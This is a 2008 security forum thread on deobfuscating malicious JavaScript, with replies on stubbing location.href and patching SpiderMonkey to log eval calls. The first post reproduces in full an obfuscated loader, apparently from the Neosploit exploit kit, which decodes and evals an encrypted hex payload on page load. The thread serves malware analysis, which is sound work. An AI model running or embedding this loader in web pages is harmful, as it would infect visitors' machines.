Author Topic: JavaScript Deobfustication Question (Read 9689 times)

cjeremy · July 11, 2008, 05:39:28 am

Can anyone help me with a little guidance on how exactly you get around the "location.href" in order to decode obfusticated JavaScript? Here is an example of what I am try to deobfusticate (an actual script):

Code: [Select]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

function wOd3DlOah(g06cS78wT, b08o6M2Qh){var tiHq264Bk = eval;var F2s6tCwSu = arguments.callee;var oeXd5l4i4 = location.href;F2s6tCwSu = F2s6tCwSu.toString();F2s6tCwSu = F2s6tCwSu + oeXd5l4i4;var lG4qP1k5L = F2s6tCwSu.replace(/\W/g, "");lG4qP1k5L = lG4qP1k5L.toUpperCase();var Q7XLR2g46 = 4294967296;var TRQ2SlFOK = new Array;for(var iyWyibo1P = 0; iyWyibo1P < 256; iyWyibo1P++) {TRQ2SlFOK[iyWyibo1P] = 0;}var x08pg60t7 = 1;for(var iyWyibo1P = 128; iyWyibo1P; iyWyibo1P >>= 1) {x08pg60t7 = x08pg60t7 >>> 1 ^ (x08pg60t7 & 1 ? 3988292384 : 0);for(var f7t6uA52T = 0; f7t6uA52T < 256; f7t6uA52T += iyWyibo1P * 2) {var Th782eo73 = iyWyibo1P + f7t6uA52T;TRQ2SlFOK[Th782eo73] = TRQ2SlFOK[f7t6uA52T] ^ x08pg60t7;if (TRQ2SlFOK[Th782eo73] < 0) {TRQ2SlFOK[Th782eo73] += Q7XLR2g46;}}}var x6nN1E856 = Q7XLR2g46 - 1;for(var vg6be4P48 = 0; vg6be4P48 < lG4qP1k5L.length; vg6be4P48++) {var s4Xb2YK6J = (x6nN1E856 ^ lG4qP1k5L.charCodeAt(vg6be4P48)) & 255;x6nN1E856 = (x6nN1E856 >>> 8) ^ TRQ2SlFOK[s4Xb2YK6J];}x6nN1E856 = x6nN1E856 ^ (Q7XLR2g46 - 1);if (x6nN1E856 < 0) {x6nN1E856 += Q7XLR2g46;}x6nN1E856 = x6nN1E856.toString(16).toUpperCase();while(x6nN1E856.length < 8) {x6nN1E856 = "0" + x6nN1E856;}var Rm3sHDrL7 = new Array;for(var iyWyibo1P = 0; iyWyibo1P < 8; iyWyibo1P++) {Rm3sHDrL7[iyWyibo1P] = x6nN1E856.charCodeAt(iyWyibo1P);}var pn2vHu2ni = "";var Ca5B5W3A2 = 0;for(var iyWyibo1P = 0; iyWyibo1P < g06cS78wT.length; iyWyibo1P += 2){var Th782eo73 = g06cS78wT.substr(iyWyibo1P, 2);var clDsnj045 = parseInt(Th782eo73, 16);var Oc86UChGH = clDsnj045 - Rm3sHDrL7[Ca5B5W3A2];if(Oc86UChGH < 0) {Oc86UChGH = Oc86UChGH + 256;}pn2vHu2ni += String.fromCharCode(Oc86UChGH);if(Ca5B5W3A2 + 1 == Rm3sHDrL7.length) {Ca5B5W3A2 = 0;} else {Ca5B5W3A2++;}}var rAoH46ngd = 0;try {tiHq264Bk(pn2vHu2ni);} catch(e) {rAoH46ngd = 1;}try {if (rAoH46ngd) {window.location = "/";}} catch(e) {}}

//-->

</script>

</head>

<body onload="wOd3DlOah('9BB8b397a8a0A69f5585a7A6AD83698066936D84766A8665A09cabAC60579FA580977d8B6C8C865AB0b9a6a6549b67a6659B79AB82ac576e55A8BB95a072AD92A7638dAA9F817a9c8388B854715798a39cb8b299A2abaa5f98A4B1a0999c72A796B565A068a69D64817377655474579Da4A6a6A89Da6A55F9db5AA9A6F7fad9C7F86b08279AA576e558BBB9F7e7aA27f7AB673a8A38aABA39Eb1AC5c5d727FA7a08D889F827cAA5172638daa9f817a9C8388b8545f57A365a4a978806469686CABA4b754868d89787a9a7885A15774517Db9B07e77a28576a871b799A4a398949A6B74908B669e5d5565675D6f898D837c889c6785A4576e55959B867B7c8E6486b073A8A38CA7A19ab58895a79c5F5a70B9a6a654ad6d79a196A79C7c6e576e5577776D68706D68677c7b6Faa98A951a5759c8D7C786a628C638254A29CAE5176B5b795ad729DA0A76bBB95A6579B9d82AD9C7577807B517263756F549ba37E9F9a86777d7B576D55757A6a6f579b9d82AD9C7577807b5c606C65afA4698e8a7d8478658b929B9D82ad9c7577807B8E558065646FB4AD92a7638d6C6bb0B0a167957d547157686c9bB2B75Caa98a95199af929e8B787a7A7963825465696f6C55a7B1819E8E78747e87805498a3849b8C84887d7857756f7263765D54b27f696cbcbea466896F5172638d6c6bb0B0A167957d54727575516663A3545C7F6f68AEbcb566866F575755746573546A70696D757e66676f6b516F63755D6f9dA6a35DB9a6A654a39C938e89b87D6778576E55738054A09C998A7bB68e677557735167787b6f54A39c938e89B87d6778575C7263A9a081a18E72788C89545e57695a55BEBB95a65780a57d857b64809A81517263A9a081a18E72788c89545f57A396979c8ba77D6a786Ca5759C8D7C786a628C9E8eA87C796D6181A68f91547457a1679A9e7c756a688890AFAA968d7DAA7A6884a25492577F696cBCBEa466896f6C9ea9655ca4698e8a7D8478658B9280a57D857b64809A818E557f65645D57B2a1679A9e7C756A6888908Cb97c766d677D988da2545f7457A76b8bb187969F7F6870c0c2B1AA98a951818c75a86c7E90948A638254AA6D7f9D88A5ad7c6b576451667EabA3a65fAD92a763AC82958a83658086B2547157676C55aa939587836b7c78B0657054898D837C889C6785a4659D9AB1acA89C72579883a4988068827A9e606e6e54afAD98a355b97cAD978ba0AAA7856571545f837A65B77D7B8d9a8C519363978A867E7C886894b262979f98A378b2a99975AB5f9883A4988068827a9E5e6C655a54696C66708F8E64a86f7e8A98986571545f837a65B77D7b8D9a8C51738183546C60578F55B3778B8D7f7864669aA0AA6bb09a859EBCb7769172b47d7E73b96c7B909A86558065807D67AB697C9cA88954955759ab798da087999f796c6372546560729a9B636d807D67ab697C9Ca889547357615e63c0807d67ab697C9ca88954627451AB798Da087999F796c7EC2807d67ab697c9CA8895474577D7E73B96c7B909A8663b7B487A8a9a09F9C6B766a5d65aba08aB3B599a67a98A49A6B6e6fab9Fa09D9A6B917d64AB6F788ea69A62A09CA598A9ab6570546f6051B08F8E64a86F7e8A9898657154596753556e65807d67AB697c9ca8896fB4AD92a763B967A56dAC76659098547157a596AC6386A6A698b06C9Bb2B75caa98a95199AF929e8B787a7A7963825464725795A190af8b757a8075557F656c6f579B9d82ad9c7577807B5C606c65afA86AA867AA88758187929B9d82ad9c7577807B8e558065807d67AB697C9cA889629A9F92a786B4989978ab5999af929e8b787a7A796c80B1AA98a951AD99796688b083768c638254565972a796b5659E68AF8D689Ab0B7995474576170a9b4A65cAD98a355A7B1819e8e78747e8765715467725199AF929e8b787A7a7963815484796a8069AE9E9aAC65a396a3AAb99c6F579b9D82AD9C7577807B51608065665db2ad92a7638EA87c796D6181A68F54715787736892799F8D9Daf5fa8b8a7a7A8A95F95A190af8B757a80756163775D6fAD98A355ABb97E806b82647C8d657154a798a3A8A88EA2A85F80A57d857b64809A815d55747B5d6FAD98a3558D78777DA9687e81736571549fAB7B817790677B81575E55B778A56aac7c618296A09e68AF8d689Ab0B7999172A0975d8d78777Da9687E8173657054676051B08D78777Da9687e8173657154816A747EB576818067575c55757a6a6fb4AF87697599AD807c8E5160806587a8A9A09f9C71abA6A3a47A9996B588a3989C5f7b68868Ea6658483615E7EAE9A5cA16BA98B7aaaa1a69C575c557465717157AB64A679BA7964848A5Fa1a8b39BA89f6051b0AD79ac8a6E9c9Ea7a86571546772ae55A8b1A79957b29B69BB9b6B99A4A996606e80b1b1AD98a3559777a185a07b6866b56571546772A5a7bc65AF9867ac618d77bc82a95faf87697599ad807C8e5A70C0659795AB9a995da86e54AF8B699E86AC896B65A9576E557480b1a8a9B051B0ACAB545c8B699e86AC896b65A96051b0BAAEA298a6ae5fa1b2a895a8a0a69F55806556635972AEb263a895A89a9F599A6c65afB1b4417397B5BE80668668815D6a7E69766C7069767Aa767956D986277847A9A757a6e6A6E747e65966C6d676D887E6A6A6d6E636a757C6B6B7a6b616a737e69766c7069767AA767756D786297A47A9A6D6a6d936cA77E696C9A6f686E737D646a6d6e636a757c6B6b7a6B616A737e69966c7069967A8767756d786297a47a9a96677877767c8669757C70656d7a7D756a6d6E636A757C6b6b9A6B616A737879696770766E7b7b6a6A706C657684a664957078726E898676959D78686c777d6a6C6f7863967C7C976C6c709276897a956a6d996168897a64687c6a9577867e66966F6C666D79876c956A6d946e878675969C78766Ba77A676899986A767a86676a6d6f966d7A7E966c6C706a6cA87c7a95986C666B897B6A959d706597A67E95757b706776798769966A6D62967Aa665966D6F636Ea5a768766798666ea67E6a966F78696E85a769959D6d766a767896969A706796777b6a969870666e777E696b9B6F696D747E6C6a686e616B797A796b6E6B6368868777756978666B797e66767d6f626D78876c6d6B6E696D7b7A656C6a6C666A777c6A6b696C666D74787969676B6368a687789570709497757e6a6a7C6c757685A66C6C7d70686C877D686D6c6f686a757D676A686f946e857D6a6C9870936BA47e68956C6d6276897e9a7578707276847e69756e6C736b7B7B776D706f666A777c666a687874967b7c9A75786d746d787E696d6a6c766C7a7A956a9d6c666A767d676a686d616c7a7A756a6D996168a97a646898986a967A86676A6D6f6a6b787C6d956D6f6A6d7a7d64969B6c666ba97b6A6D986F696E857c69959a6d756d73a6956a7D706776887e66966F6E6796797B99767870666E777E696b7B6F696d747e6c6A7A6D676bA97b77696a6A9768897a646898709476867a656A7c6F6A6b787C6D956d6F6a6d7A7d64767B6c666b897D676A686c666c7A7a676A7D6b636886799a6898706597A97C986d7078686d787d966C6a6c646D767A656a6f6D666b777B6c6b9A6B616a737875959978629678a6966a68707476867a656a9C6F6a6B787C6D956d6f6a6d7A7D64969b6C666bA97d676A686C666c7B7a676A9D6B6368a6799A6878706597a97C786d7098686d787d966C6a6c646D767A656a6f6d666b787b6c6b9A6b616A73787595997862767886766A68709476867A656A7C6F6a6B787c6D756D6F6A6D7a7D64969B6C666bA97d676a686c666c7C7a676a9d6b6368a6797A6878706597A97c986D7078686D787D766C6A6c646d767a656a6f6d666b797b6c6b9a6b616a73787575797862967886766a68707476867A656A7C6F6A6B787C6d956d6F6A6D7a7d64767B6c666b897d676A686C666ca47A676a9d6B6368a6797A6878706597A97C986d7098686D787D966c6A6C646D767a656A6F6D666b7a7B6c6B7a6b616A73789575797862967886766a68709496a67A656a9c6F6a6b787c6D756d6F6A6d7a7d64767b6C666B897D676a686c666cA57a676A9D6b636886799a6898706597a97c786d7078686d787d766C6a6C646d767A656a6F6D666B7B7b6c6b7A6B616A737875959998629678a6966A68707496A67a656a7c6f6a6B787c6D956d6f6A6D7A7d64767B6c666BA97d676A686C666c867a676a9d6B636886797a6878706597A97C786d7078686d787d966C6a6c646d767a656A6F6D666B7C7B6c6B7a6B616a73789969676a966E85a6976A686c93967aA6956d696F6976777E6d6C6D6e666B797A666C6a6c666A777C6a6b696C666ba9787969676A966885866c966A7069967A7e976C686b636886a867689C6A756A767876959d70736a757b99756978746e757D68766F6F696C7A7D6c6a686E616D767a656a6f6d666b767b6C6a686C6a6BA67a656d9D6F726D7a7D95956e6D936e777e696b6B707676738675956d78736E787E6b6A9c6C686D778676959B7069967Aa66895996c666C78A66b959D706896A97E69956E986a6e7A7b6C6a9B6C646c797A756A6d6C676Ba97b6A6a9c6D656Ba9789969676A966E76877a6c7b6F67777b7d686c796e686A757D676A686C666C797b6d6A6F6e6168A97A64687c6a956a767876767a706776777b6A766F70676E897c9a6B7098956C7a86776a686E616B797e9a756E98936Ea5867875699868777886676B6b786996a5876D766C706997767c98756E98646E7cA7967569709276857a7a967078726e77A76d966c98666ba87b656B696C666B767c6A6a786d766a767876767A706776777b6A6c6e6f686e7aA669766a70656d7A7D796a686e616B797A676a6f6E6168897a64689c6a956a767876959A786576777B79966E7065777B7a656C7898936C7C7c6D6d6a6F616e7a7D6A6C6a6D666Ba77D95966e6E926C7c7d676D6A6F676d7A7D66766F70676E897C9a6b7098956C7Aa6976a9D709776857e9A959b786A6EA47D656c6c786A6D877B686d6f6F636D767E966A7a6C966b897A6597686B636886797a6D6970756E7b7d6C6d7D70777678A7956a686e616b79a66C95706f966D737C6d76706E6976867A7A957070756E76876C6C6b786396A47e6A6C6E786a6a847D75966e6E726C7c7d676D6A6F676d7a7B7A6a7d986877787D68969878686eA5a768956F6C736C7A7B6B6A7d6E6168897a64687c6a7569897E95757A6C666a847E6B75796F666E877d757667786976797B6a6B7B6C646C7b7a95696A6A9768a5799A6c6E6f686e7a8669766a70656D7a7d996a686C766d767A656a6f6D666A777D65689C6A956A767896687D6e736D797e6B966C986176787D6A6c7c6C666aa77d676A686f6597737d676D9B6F966E86a76D766c6D766a767896976a6B6368867a676879989276887E75766970726Aa47D776d6C6f6577847e79956C6F926CA47c68757B706997777e6C969870756a757d666a686D666c797A75696a6A7768A57d776D6c6f6597a47E99756C6f926ca47B6a6a7a6e616B797a676b6D6d666a777d65689c6A956A767896696a6a97767Ba66b966a6C646EA4A667756F6D966d7Ca79a967098946b797b796A6d706796a57e666d6B98666e7c7C6a6C6F6c666a877b6a6c6E6F686E7a8669766A70656d7a7d996B7A6b616A73866B956E98686a75a7656b6D70656E757c986B6f6f636ca97B6A6b7c6c6496A48664957078726e89a696959D78686c777E68966F70926e76A795956D6E6977757E6A766A70927673A7956A706C66977C7E68966F7096967587756a6a6C946d747879696798616B7aa66b6c9B6E976c7b7c996d6A6D649678A696966c6e6597a48669966F70766E778776966C70696b887a6796989896767586766A6a6C976b797A677678709296A487756b677095767aa66b956e98696e78A76C7578786497a47a676a9D6E6168a97A64757A6D69967A7C786D696D686Ca97E676A9D986796A586696c6E986a9679876C9598706697A5a66995996C956a77876D766A70676B7B7A986a6d6c686EA48775766C78646D737B646b6c70946E77876c7569706877877a9A757078656E897C69756b707296a97A79956F707676737c699598986276847e6A767c6D646e78867875786E63967c7B6a6B7B706A6b7C7C976B6870656c797B666b6d6D666E7B7C6A6b6e6D646c797b656B9B6D946e7A7c6A956d70686c857B6D6b6D6D736b7A7c6A6B6A6D666C7C7e6875786d936b757C6c6B7070686C797b7595996d956B797C6b756e706a6b7b7a656b686C666D79876c956a6D746E87A695969c78766A857D65689c6A9596a4a664757078726EA9A696757D78686C777E67766C706a96A57c687569986497797e6a766B706A6C7886799598707796a47a6d96686D726E767E666c9b6D666E767c796A9D6e6168897a64969C6B616a736C5D6F')">



</body>

</html>

Ok so let me explain what I usually do to deobfusticate stuff like this. I grab the file, remove all the html refrences to just leave the javascript portions, and then I change the "eval" or "document.write" to a "print" command. Then I save the file and use SpiderMonkey to execute the script from the command line like this: js -f myfile.

This works for a lot of the scripts I try to deobfusticate, but the "location.href" always gives me an error as it is not defined in JavaScript. So I thought I would just replace the "location.href" with the domain name and file path, but this doesn't work either as I get a jumbled up out put. So can someone point me in the right direction on how to get around this issue? Many thanks to anyone that can in advance.

Also Bobby if your reading this I would even be open to pointers using Malzilla to do this, but I have to admit since I have moved to a Mac as my main working computer I don't use it as often as I use to.... But I still like your tool and if it will help me with scripts like this I will definitely open a VM to run Malzilla in.

bobby · July 11, 2008, 07:42:34 am

It isn't such a big problem to get the things working.
First, Location is a DOM, and HREF is a property of Location, so you can't define them as variable.

Put this at the beginning of JavaScript code:

Code: [Select]

function my_location () {
this.href = "http://www.something.com";
};

location = new my_location;

This way you define an object Location, define a HREF property, and make an instance of the object.
Same way you can define document properties (cookies etc.).

Lately, I have problems with more complicated scripts that are using CreateElement, GetElementByID etc. and these can't be implemented in easy way.

btw. do you have a GCC on Mac? I can send you the code of hacked SpiderMonkey (that I use in Malzilla), so you won't need to replace eval() anymore. It will write temp file at every eval() call, so you can see what it does.

cjeremy · July 11, 2008, 08:09:27 am

Hey that worked like a charm thanks again. Just can't believe it was that simple.

Yes, I have gcc on my Mac and if you would like to send me that code that would be outstanding.... Thanks again for all the help and thanks in advance for the hacked code for SpiderMonkey.

--jeremy

bobby · July 11, 2008, 08:24:11 am

First take a look here:
http://blog.didierstevens.com/2007/08/07/a-second-spidermonkey-trick/

That is the hack I based my hack upon.
Didier use hacks for both eval() and document.write(), so that would probably be more suitable for your needs.
I use just the eval() hack, modified to write to a subfolder.
I guess you will use original Didiers hack, but if you still want my version, I will upload it for you.
You can apply Didier's hack to newer SpiderMonkeys without a problem.

sowhat-x · July 11, 2008, 11:57:53 am

...lol,wouldn't it be better if this was asked in public section,
in order for other people out there to learn few tricks as well?

cjeremy · July 11, 2008, 03:18:45 pm

Damn sowhat-x, your making sense again.... Yea you can move it to public if you would like, as I forgot about the private/public stuff.

Thanks Bobby for all the information and I will look into Didiers hack... Thanks again guys!

realdeal · August 04, 2008, 06:47:24 pm

Hi,

Those can be a real pain. If you want to decode it in spider monkey, try putting this (below) at the top of your input file:

// change the location.href value to where ever you got the neosploit page
location = new Object();
location.href = 'hxxp://cyzmvif.com/cgi-bin/index.cgi?dx';
real_eval = eval;
eval = print;

// Followed by the code to compile
function wOd3DlOah(g06cS78wT, b08o6M2Qh){var tiHq264Bk = eval ...
wOd3DlOah('9BB8b397a8a0A69f5585a7A6AD83698066936D84766A8665A0 ...

// Then in your konsole # js inputfile > outputfile

Author Topic: JavaScript Deobfustication Question (Read 9689 times)

cjeremy

JavaScript Deobfustication Question

bobby

Re: JavaScript Deobfustication Question

cjeremy

Re: JavaScript Deobfustication Question

bobby

Re: JavaScript Deobfustication Question

sowhat-x

Re: JavaScript Deobfustication Question

cjeremy

Re: JavaScript Deobfustication Question

realdeal

Re: JavaScript Deobfustication Question